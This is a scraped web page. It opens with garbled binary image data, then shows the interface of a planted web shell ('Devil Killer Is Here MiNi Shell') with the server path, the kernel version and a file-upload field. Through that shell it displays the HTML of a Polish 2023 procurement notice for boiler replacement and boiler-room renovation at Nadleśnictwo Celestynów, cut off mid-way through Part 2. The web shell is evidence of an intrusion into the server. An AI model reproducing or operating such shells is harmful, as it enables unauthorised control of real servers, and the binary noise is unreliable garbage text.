JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230721/0032065501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Wymiana źródeł ciepła wraz z remontem pomieszczeń kotłowni w budynkach Nadleśnictwa Celestynów” – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Celestynów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010158302</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Obrońców Pokoju 58</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Celestynów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">celestynow@warszawa.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-celestynow</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wymiana źródeł ciepła wraz z remontem pomieszczeń kotłowni w budynkach Nadleśnictwa Celestynów” – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3479809d-27ac-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00320655</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00231985/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana źródeł ciepła w budynkach Nadleśnictwa Celestynów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3479809d-27ac-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>Platformy e-Zamówienia („Platforma”), która jest dostępna pod adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej<br/>(celestynow@warszawa.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy.<br/>Zamawiający zmiany i wyjaśnienia treści niniejszej specyfikacji warunków zamówienia („SWZ”) oraz inne dokumenty zamówienia<br/>bezpośrednio związane z postępowaniem o udzielenie zamówienia zamieszczał będzie na stronie prowadzonego postępowania:<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3479809d-27ac-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy, w tym minimalne<br/>wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji<br/>połączenia określa „Regulamin korzystania z Platformy e-Zamówienia”, dostępny pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/ oraz informacje zamieszczone na stronie Platformy w zakładce „Centrum Pomocy”.<br/>Dokumenty elektroniczne wymienione w SWZ, o których mowa w §2 ust. 1 rozporządzenia wskazanego w pkt 14.5. SWZ sporządza<br/>się w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247 z późn. zm.), z uwzględnieniem rodzaju<br/>przekazywanych danych i przekazuje się jako załączniki.<br/>Komunikacja w postępowaniu (z wyłączeniem składania ofert – sposób złożenia oferty opisany jest w pkt 14.9. SWZ), odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”) oraz za pośrednictwem poczty elektronicznej.<br/>Dokumenty w postępowaniu sporządza się, pod rygorem nieważności, w formie elektronicznej (tj. w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Celestynów. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Patryka Makowskiego, z którym w<br/>sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod<br/>adresem iod@comp-net.pl .<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich wniesienia.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">przepisy PZP.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.<br/>Niezależnie od postanowień ust. 7., w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą<br/>przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane<br/>podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>Szczegółowe informacje dotyczące RODO zostały zawarte w rozdziale 30 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.15.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1. WYMIANA ŹRÓDŁA CIEPŁA WRAZ Z REMONTEM POMIESZCZENIA KOTŁOWNI W BUDYNKU<br/>LEŚNICZÓWKI CZARCI DÓŁ (NR INW. :110-00042)<br/>Lokalizacja: ul. Warszawska 67, 08-445 Osieck (dz. ew. 2311, obr. Osieck, gmina Osieck)<br/>Budynek mieszkalny wraz z pomieszczeniem kancelarii. Część mieszkalna budynku zajmuje 90,03% powierzchni<br/>użytkowej.<br/>Zakres prac sanitarnych:<br/>1) Wymiana kotła stałopalnego na nowy kocioł zgazowujący drewno 5 klasy;<br/>2) Wymianę urządzeń orurowania i armatury w kotłowni;<br/>3) Dostosowanie pomieszczenia kotłowni do obowiązujących wymagań w zakresie instalacyjnym.<br/>Zakres towarzyszących robót budowlanych:<br/>1) Wykonanie podpicia istniejących fundamentów w części wg. załącznika rysunkowego w celu zwiększenia wysokości<br/>pomieszczenia;<br/>2) Wykonanie nowej posadzki betonowej;<br/>3) Ułożenie gresu technicznego na części nowej posadzki;<br/>4) Wykonanie nowych schodów betonowych;<br/>5) Wykonanie studzienki schładzającej wraz z montażem pompy do przepompowywanie wody;<br/>6) Wykonanie kanałów wentylacji grawitacyjnej nawiewnej i wywiewnej;<br/>7) Naprawa tynków wewnętrznych;<br/>8) Roboty malarskie.<br/>9) Wykonanie wykopu zewnętrznego,<br/>10) Wykonanie schodów zewnętrznych betonowych i wymurowanie murków oporowych z bloczków betonowych na ławie<br/>żelbetowej,<br/>11) Demontaż istniejącego okna, rozbiórka muru pod oknem, obróbka ościeżnicy,<br/>12) Montaż nowych drzwi stalowych z naświetlem górnym nad drzwiami,<br/>13) Wykonanie tynków na murku oporowym, wykończenie ościeży drzwiowych<br/>3.6. Zakres robót w każdej z 5 części uwzględnia również:<br/>1) dostosowanie połączeń do istniejących w kotłowni instalacji w celu zapewnienia prawidłowego działania urządzenia oraz<br/>wymianę elementów instalacji (m.in. elektrycznej, hydraulicznej, sanitarnej, wentylacyjnej lub kominowej),<br/>2) wykonanie niezbędnych robót budowlanych w celu dostosowania parametrów pomieszczenia kotłowni do obowiązujących<br/>wymagań w zakresie instalacyjnym,<br/>3) prace remontowo-naprawcze w kotłowni oraz odtworzenie do stanu pierwotnego wszelkich naruszonych powierzchni,<br/>elementów konstrukcyjnych oraz innych elementów uszkodzonych, bądź naruszonych podczas prac montażowych lub<br/>modernizacyjnych,<br/>4) wykonanie wymaganych kontroli, sprawdzeń oraz odbiorów przez uprawnione osoby (m.in. kominiarza), prób i sprawdzeń<br/>z dokonaniem regulacji instalacji c.o. oraz przeszkolenia osób obsługujących kocioł (potwierdzone protokołem ze szkolenia),<br/>5) utylizację powstałych odpadów budowlanych w tym starego kotła wraz ze zbędnym wyposażeniem i elementami instalacji.<br/>Wykonawca zobowiązany będzie przy odbiorze końcowym dostarczyć Zamawiającemu kartę przekazania odpadu BDO.<br/>6) jeżeli zajdzie taka potrzeba, Zamawiający może żądać od Wykonawcy drugiego uruchomienia (ustawienia parametrów<br/>pieca) przez serwis fabryczny w trakcie trwania sezonu grzewczego.<br/>3.3. Przewidywany do wykonania zakres robót przedstawia szczegółowy opis przedmiotu zamówienia (załącznik nr 9)<br/>zawierający:<br/>a) projekt techniczny instalacji sanitarnej;<br/>b) projekt robót budowlanych (brak tego dokumentu dla cz. 5 zamówienia);<br/>c) specyfikacja technicznego wykonania i odbioru robót;<br/>d) przedmiary robót.<br/>Uwaga! Załączone do dokumentacji przedmiary robót, z racji ryczałtowego rozliczenia prac, są tylko dokumentem<br/>pomocniczym. Wykonawca musi samodzielnie określić całokształt prac do wykonania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232460-4 - Roboty sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru oferty najkorzystniejszej Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>Najniższa Cena (C) – 60%<br/>Wydłużenie okresu gwarancji (G) – 40 pkt<br/>21.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium ,,Cena” ocena złożonych ofert zostanie dokonana wg następującego<br/>wzoru:<br/>najniższa oferowana cena<br/>--------------------------------------- x 100x 60% = liczba pkt przyznanych<br/>cena oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w formularzu ofertowym<br/>sporządzonym wg załącznika nr 1 do SWZ.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji”, za które można uzyskać 40 pkt zostanie wyliczone w następujący sposób:<br/>Okres gwarancji wynosi 36 miesięcy. Jeżeli Wykonawca zaoferuje:<br/>a) 36 miesięcy gwarancji otrzyma 0 pkt,<br/>b) 48 miesięcy gwarancji otrzyma 20 pkt,<br/>c) 60 miesięcy gwarancji otrzyma 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do przedłużenia okresu gwarancji poprzez<br/>zakreślenie przez Wykonawcę odpowiedniej treści w formularzu oferty.<br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg. poniższego wzoru:<br/>S = C + G<br/>gdzie:<br/>S – całkowita liczba punktów;<br/>C - liczba punktów w ramach kryterium „Najniższa cena”;<br/>G - liczba punktów w ramach kryterium „Wydłużenie okresu gwarancji”<br/>21.3. Oceną końcową będzie suma punktów otrzymanych w poszczególnych kryteriach, o których mowa w pkt 2.<br/>Szczegółowe informacje o sposobie oceny ofert zawiera rozdział 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2. WYMIANA ŹRÓDŁA CIEPŁA WRAZ Z REMONTEM POMIESZCZENIA KOTŁOWNI W BUDYNKU DAWNEJ<br/>PODLEŚNICZÓWKI POGORZEL (NR INW.: 110-00209).<br/>Lokalizacja: ul. Brzozowa 24, 05-430 Celestynów (dz. ew. 717, obr. Stara Wieś, gmina Celestynów)<br/>Budynek mieszkalny w 100% powierzchni użytkowej.<br/>Zakres prac sanitarnych:<br/>1) Wymiana kotła stałopalnego na nowy kocioł zgazowujący drewno 5 klasy;<br/>2) Wymianę urządzeń orurowania i armatury w kotłowni;<br/>3) Dostosowanie pomieszczenia kotłowni do obowiązujących wymagań w zakresie instalacyjnym.<br/>Zakres towarzyszących robót budowlanych:<br/>1) Demontaż istniejącej stolarki drzwiowej;<br/>2) Rozbiórka ścianek działowych i naprawa posadzki betonowej;<br/>3) Demontaż hydrofora;<br/>4) Demontaż okna i zamurowanie otworu;<br/>5) Wykonanie studzienki schładzającej wraz z montażem pompy do przepompowywanie wody;<br/>6) Wykonanie kanałów wentylacji grawitacyjnej nawiewnych i wywiewnych;<br/>7) Montaż stolarki drzwiowej;<br/>8) Naprawa tynków wewnętrznych;<br/>9) Roboty malarskie.<br/>Zakres towarzyszących robót budowlanych:<br/>1) Wykonanie podpicia istniejących fundamentów w części wg. załącznika rysunkowego w celu zwiększenia wysokości<br/>pomieszczenia;<br/>2) Wykonanie nowej posadzki betonowej;<br/>3) Ułożenie gresu technicznego na części nowej posadzki;<br/>4) Wykonanie nowych schodów betonowych;<br/>5) Wykonanie studzienki schładzającej wraz z montażem pompy do przepompowywanie wody;<br/>6) Wykonanie kanałów wentylacji grawitacyjnej nawiewnej i wywiewnej;<br/>7) Naprawa tynków wewnętrznych;<br/>8) Roboty malarskie.<br/>9) Wykonanie wykopu zewnętrznego,<br/>10) Wykonanie schodów zewnętrznych betonowych i wymurowanie murków oporowych z bloczków betonowych na ławie<br/>żelbetowej,<br/>11) Demontaż istniejącego okna, rozbiórka muru pod oknem, obróbka ościeżnicy,<br/>12) Montaż nowych drzwi stalowych z naświetlem górnym nad drzwiami,<br/>13) Wykonanie tynków na murku oporowym, wykończenie ościeży drzwiowych<br/><br/>Zakres robót w każdej z 5 części uwzględnia również:<br/>1) dostosowanie połączeń do istniejących w kotłowni instalacji w celu zapewnienia prawidłowego działania urządzenia oraz<br/>wymianę elementów instalacji (m.in. elektrycznej, hydraulicznej, sanitarnej, wentylacyjnej lub kominowej),<br/>2) wykonanie niezbędnych robót budowlanych w celu dostosowania parametrów pomieszczenia kotłowni do obowiązujących<br/>wymagań w zakresie instalacyjnym,<br/>3) prace remontowo-naprawcze w kotłowni oraz odtworzenie do stanu pierwotnego wszelkich naruszonych powierzchni,<br/>elementów konstrukcyjnych oraz innych elementów uszkodzonych, bądź naruszonych podczas prac montażowych lub<br/>modernizacyjnych,<br/>4) wykonanie wymaganych kontroli, sprawdzeń oraz odbiorów przez uprawnione osoby (m.in. kominiarza), prób i sprawdzeń<br/>z dokonaniem regulacji instalacji c.o. oraz przeszkolenia osób obsługujących kocioł (potwierdzone protokołem ze szkolenia),<br/>5) utylizację powstałych odpadów budowlanych w tym starego kotła wraz ze zbędnym wyposażeniem i elementami instalacji.<br/>Wykonawca zobowiązany będzie przy odbiorze końcowym dostarczyć Zamawiającemu kartę przekazania odpadu BDO.<br/>6) jeżeli zajdzie taka potrzeba, Zamawiający może żądać od Wykonawcy drugiego uruchomienia (ustawienia parametrów<br/>pieca) przez serwis fabryczny w trakcie trwania sezonu grzewczego.<br/>3.3. Przewidywany do wykonania zakres robót przedstawia szczegółowy opis przedmiotu zamówienia (załącznik nr 9)<br/>zawierający:<br/>a) projekt techniczny instalacji sanitarnej;<br/>b) projekt robót budowlanych (brak tego dokumentu dla cz. 5 zamówienia);<br/>c) specyfikacja technicznego wykonania i odbioru robót;<br/>d) przedmiary robót.<br/>Uwaga! Załączone do dokumentacji przedmiary robót, z racji ryczałtowego rozliczenia prac, są tylko dokumentem<br/>pomocniczym. Wykonawca musi samodzielnie określić całokształt prac do wykonania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span 